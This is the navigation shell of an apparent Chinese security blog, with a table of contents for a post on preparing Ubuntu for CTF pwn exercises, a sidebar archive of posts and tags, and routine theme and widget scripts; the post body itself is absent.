        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#配置"><span class="toc-number">1.</span> <span class="toc-text">配置</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#VIM"><span class="toc-number">1.1.</span> <span class="toc-text">VIM</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#安装Capstone（反编译框架）"><span class="toc-number">1.2.</span> <span class="toc-text">安装Capstone（反编译框架）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#安装Binutils（二进制工具集）"><span class="toc-number">1.3.</span> <span class="toc-text">安装Binutils（二进制工具集）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#第三方库"><span class="toc-number">1.4.</span> <span class="toc-text">第三方库</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#安装gdb工具"><span class="toc-number">1.5.</span> <span class="toc-text">安装gdb工具</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#peda"><span class="toc-number">1.5.1.</span> <span class="toc-text">peda</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pwndbg"><span class="toc-number">1.5.2.</span> <span class="toc-text">pwndbg</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#pwngdb"><span class="toc-number">1.5.3.</span> <span class="toc-text">pwngdb</span></a></li><li class="toc-item toc-level-4"><a class="toc-link" href="#gef"><span class="toc-number">1.5.4.</span> <span class="toc-text">gef</span></a></li></ol></li><li class="toc-item toc-level-3"><a class="toc-link" href="#ROPgadget"><span class="toc-number">1.6.</span> <span class="toc-text">ROPgadget</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#one-gadget"><span class="toc-number">1.7.</span> <span class="toc-text">one_gadget</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#LibcSearcher"><span class="toc-number">1.8.</span> <span class="toc-text">LibcSearcher</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#实例-Pwn分析之栈溢出"><span class="toc-number">2.</span> <span class="toc-text">实例:Pwn分析之栈溢出</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#解题步骤"><span class="toc-number">3.</span> <span class="toc-text">解题步骤</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#0X01"><span class="toc-number">3.1.</span> <span class="toc-text">0X01</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0X02"><span class="toc-number">3.2.</span> <span class="toc-text">0X02</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#0X03"><span class="toc-number">3.3.</span> <span class="toc-text">0X03</span></a></li></ol></li></ol>
    </div>
    
    <div class="back-top iconfont-archer">&#xe639;</div>
    <div class="sidebar sidebar-hide">
    <ul class="sidebar-tabs sidebar-tabs-active-0">
        <li class="sidebar-tab-archives"><span class="iconfont-archer">&#xe67d;</span><span class="tab-name">Archive</span></li>
        <li class="sidebar-tab-tags"><span class="iconfont-archer">&#xe61b;</span><span class="tab-name">Tag</span></li>
        <li class="sidebar-tab-categories"><span class="iconfont-archer">&#xe666;</span><span class="tab-name">Cate</span></li>
    </ul>
    <div class="sidebar-content sidebar-content-show-archive">
          <div class="sidebar-panel-archives">
    <!-- 在ejs中将archive按照时间排序 -->
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    
    <div class="total-and-search">
        <div class="total-archive">
        Total : 11
        </div>
        <!-- search  -->
        
    </div>
    
    <div class="post-archive">
    
    
    
    
    <div class="archive-year"> 2019 </div>
    <ul class="year-list">
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">09/16</span><a class="archive-post-title" href= "/2019/09/16/2019-%E7%A6%8F%E5%BB%BA%E7%9C%81%E7%BD%91%E7%BB%9C%E5%AE%89%E5%85%A8%E5%AE%A3%E4%BC%A0%E5%91%A8%E9%BB%91%E7%9B%BE%E6%9D%AFWriteup/" >2019 福建省网络安全宣传周黑盾杯Writeup</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/22</span><a class="archive-post-title" href= "/2019/08/22/%E6%B5%85%E8%B0%88Docker-for-Windows%E4%B8%8EVMware%E5%85%B1%E5%AD%98/" >浅谈Docker-for-Windows与VMware共存</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/22</span><a class="archive-post-title" href= "/2019/08/22/Docker%E5%85%A5%E9%97%A8%E4%B9%8B%E5%90%90%E8%A1%80%E6%80%BB%E7%BB%93/" >Docker入门之吐血总结</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">08/15</span><a class="archive-post-title" href= "/2019/08/15/2018FJ%E5%B7%A5%E6%8E%A7%E6%94%BB%E9%98%B2%E5%A4%A7%E8%B5%9BWriteUp/" >2018FJ工控攻防大赛WriteUp</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">05/23</span><a class="archive-post-title" href= "/2019/05/23/Ubuntu-16-04-for-Pwn/" >Ubuntu 16.04 for Pwn</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/24</span><a class="archive-post-title" href= "/2019/04/24/Git-for-github-%E4%BD%BF%E7%94%A8%E7%AC%94%E8%AE%B0/" >Git for github 使用笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/15</span><a class="archive-post-title" href= "/2019/04/15/CTFd%E6%90%AD%E5%BB%BA%E7%AC%94%E8%AE%B0/" >CTFd搭建笔记</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/12</span><a class="archive-post-title" href= "/2019/04/12/ubuntu%E5%AE%89%E8%A3%85%E5%90%8E%E7%9A%84%E5%88%9D%E5%A7%8B%E5%8C%96%E9%85%8D%E7%BD%AE/" >ubuntu安装后的初始化配置</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/08</span><a class="archive-post-title" href= "/2019/04/08/deepin%E5%85%A5%E5%9D%91%E5%89%8D%E5%BF%85%E8%AF%BB-%E6%87%8A%E6%82%94%E7%AF%87/" >deepin入坑前必读(懊悔篇)</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/07</span><a class="archive-post-title" href= "/2019/04/07/manjaro-linux-%E5%AE%89%E8%A3%85%E5%8F%8A%E4%BD%BF%E7%94%A8/" >manjaro  linux 安装及使用</a>
        </li>
    
    
        <li class="archive-post-item">
            <span class="archive-post-date">04/07</span><a class="archive-post-title" href= "/2019/04/07/Tools-recode/" >Tools recode</a>
        </li>
    
    </div>
  </div>
        <div class="sidebar-panel-tags">
    <div class="sidebar-tags-name">
    
        <span class="sidebar-tag-name" data-tags="工控"><span class="iconfont-archer">&#xe606;</span>工控</span>
    
        <span class="sidebar-tag-name" data-tags="getshell"><span class="iconfont-archer">&#xe606;</span>getshell</span>
    
        <span class="sidebar-tag-name" data-tags="PLC"><span class="iconfont-archer">&#xe606;</span>PLC</span>
    
        <span class="sidebar-tag-name" data-tags="CTFd"><span class="iconfont-archer">&#xe606;</span>CTFd</span>
    
        <span class="sidebar-tag-name" data-tags="docker"><span class="iconfont-archer">&#xe606;</span>docker</span>
    
        <span class="sidebar-tag-name" data-tags="web,Re,crypto"><span class="iconfont-archer">&#xe606;</span>web,Re,crypto</span>
    
        <span class="sidebar-tag-name" data-tags="tools"><span class="iconfont-archer">&#xe606;</span>tools</span>
    
        <span class="sidebar-tag-name" data-tags="Git"><span class="iconfont-archer">&#xe606;</span>Git</span>
    
        <span class="sidebar-tag-name" data-tags="github"><span class="iconfont-archer">&#xe606;</span>github</span>
    
        <span class="sidebar-tag-name" data-tags="deepin"><span class="iconfont-archer">&#xe606;</span>deepin</span>
    
        <span class="sidebar-tag-name" data-tags="linux"><span class="iconfont-archer">&#xe606;</span>linux</span>
    
        <span class="sidebar-tag-name" data-tags="ubuntu"><span class="iconfont-archer">&#xe606;</span>ubuntu</span>
    
        <span class="sidebar-tag-name" data-tags="pwn"><span class="iconfont-archer">&#xe606;</span>pwn</span>
    
        <span class="sidebar-tag-name" data-tags="manjaro"><span class="iconfont-archer">&#xe606;</span>manjaro</span>
    
        <span class="sidebar-tag-name" data-tags="Hyper-v"><span class="iconfont-archer">&#xe606;</span>Hyper-v</span>
    
        <span class="sidebar-tag-name" data-tags="VMware"><span class="iconfont-archer">&#xe606;</span>VMware</span>
    
        <span class="sidebar-tag-name" data-tags="docker-compose"><span class="iconfont-archer">&#xe606;</span>docker-compose</span>
    
        <span class="sidebar-tag-name" data-tags="Pwn"><span class="iconfont-archer">&#xe606;</span>Pwn</span>
    
        <span class="sidebar-tag-name" data-tags="web"><span class="iconfont-archer">&#xe606;</span>web</span>
    
    </div>
    <div class="iconfont-archer sidebar-tags-empty">&#xe678;</div>
    <div class="tag-load-fail" style="display: none; color: #ccc; font-size: 0.6rem;">
    缺失模块。<br/>
    1、请确保node版本大于6.2<br/>
    2、在博客根目录（注意不是archer根目录）执行以下命令：<br/>
    <span style="color: #f75357; font-size: 1rem; line-height: 2rem;">npm i hexo-generator-json-content --save</span><br/>
    3、在根目录_config.yml里添加配置：
    <pre style="color: #787878; font-size: 0.6rem;">
jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true</pre>
    </div> 
    <div class="sidebar-tags-list"></div>
</div>
        <div class="sidebar-panel-categories">
    <div class="sidebar-categories-name">
    
        <span class="sidebar-category-name" data-categories="Writeup"><span class="iconfont-archer">&#xe60a;</span>Writeup</span>
    
        <span class="sidebar-category-name" data-categories="随笔"><span class="iconfont-archer">&#xe60a;</span>随笔</span>
    
        <span class="sidebar-category-name" data-categories="Pwn"><span class="iconfont-archer">&#xe60a;</span>Pwn</span>
    
        <span class="sidebar-category-name" data-categories="Docker"><span class="iconfont-archer">&#xe60a;</span>Docker</span>
    
        <span class="sidebar-category-name" data-categories="随笔/github"><span class="iconfont-archer">&#xe60a;</span>随笔/github</span>
    
    </div>
    <div class="iconfont-archer sidebar-categories-empty">&#xe678;</div>
    <div class="sidebar-categories-list"></div>
</div>
    </div>
</div> 
    <script>
    var siteMeta = {
        root: "/",
        author: "oo3"
    }
</script>
    <!-- CDN failover -->
    <script src="https://cdn.jsdelivr.net/npm/jquery@3.3.1/dist/jquery.min.js"></script>
    <script type="text/javascript">
        if (typeof window.$ === 'undefined')
        {
            console.warn('jquery load from jsdelivr failed, will load local script')
            document.write('<script src="/lib/jquery.min.js">\x3C/script>')
        }
    </script>
    <script src="/scripts/main.js"></script>
    <!-- algolia -->
    
    <!-- busuanzi  -->
    
    <script async src="//busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
    
    <!-- CNZZ  -->
    
    </div>
    <!-- async load share.js -->
    
        <script src="/scripts/share.js" async></script>    
     
    <script src="/live2dw/lib/L2Dwidget.min.js?094cbace49a39548bed64abff5988b05"></script><script>L2Dwidget.init({"pluginRootPath":"live2dw/","pluginJsPath":"lib/","pluginModelPath":"assets/","tagMode":false,"model":{"jsonPath":"/live2dw/assets/wanko.model.json"},"display":{"position":"left","width":100,"height":250},"mobile":{"show":false},"log":false});</script></body>
</html>


